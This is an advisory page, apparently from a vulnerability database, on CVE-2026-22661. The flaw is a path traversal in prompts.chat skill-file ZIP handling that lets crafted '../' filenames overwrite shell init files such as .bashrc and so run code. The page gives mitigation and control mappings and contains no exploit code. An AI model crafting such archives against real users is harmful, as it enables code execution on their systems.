CVE-2026-22661
Published: 03 April 2026
Summary
CVE-2026-22661 is a high-severity Path Traversal (CWE-22) vulnerability in Fka Prompts.Chat. Its CVSS base score is 8.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Malicious File (T1204.002); ranked at the 24.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly prevents path traversal attacks by validating filenames in ZIP archives during extraction to block ../ sequences and arbitrary file writes.
Remediates the specific flaw by requiring timely updates to commit 0f8d4c3 or later, which adds filename sanitization.
Scans ZIP archives and extracted files for malicious code, mitigating payloads that overwrite shell initialization files for code execution.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Malicious ZIP delivery triggers user extraction (T1204.002); path traversal enables writes to shell init files like .bashrc for execution (T1546.004).
NVD Description
prompts.chat prior to commit 0f8d4c3 contains a path traversal vulnerability in skill file handling that allows attackers to write arbitrary files to the client system by crafting malicious ZIP archives with unsanitized filenames containing path traversal sequences. Attackers can exploit…
more
missing server-side filename validation to inject path traversal sequences ../ into skill file archives, which when extracted by vulnerable tools write files outside the intended directory and overwrite shell initialization files to achieve code execution.
Deeper analysisAI
CVE-2026-22661 is a path traversal vulnerability (CWE-22) affecting prompts.chat prior to commit 0f8d4c3, specifically in its skill file handling mechanism. The issue stems from inadequate server-side filename validation when processing ZIP archives, allowing attackers to embed path traversal sequences such as "../" in filenames. When these malicious archives are extracted by client-side tools, files can be written outside the intended directory, enabling arbitrary file writes on the victim's system. The vulnerability carries a CVSS v3.1 base score of 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N), indicating high severity due to its potential for confidentiality and integrity impacts.
Remote, unauthenticated attackers can exploit this vulnerability by crafting and distributing malicious ZIP archives disguised as legitimate skill files. Victims must interact by downloading and extracting the archive, at which point the traversal sequences bypass directory restrictions, allowing files to be written to sensitive locations like shell initialization files (e.g., .bashrc or .profile). Successful exploitation leads to code execution on the client system, as the overwritten files can inject arbitrary commands executed upon user shell sessions.
Mitigation involves updating prompts.chat to commit 0f8d4c3 or later, as detailed in the project's GitHub commit (0f8d4c381abd7b2d7478c9fdee9522149c2d65e5) and pull request #1101, which presumably introduce proper filename sanitization. Additional guidance is available in the VulnCheck advisory on prompts.chat path traversal via skill file handling.
Details
- CWE(s)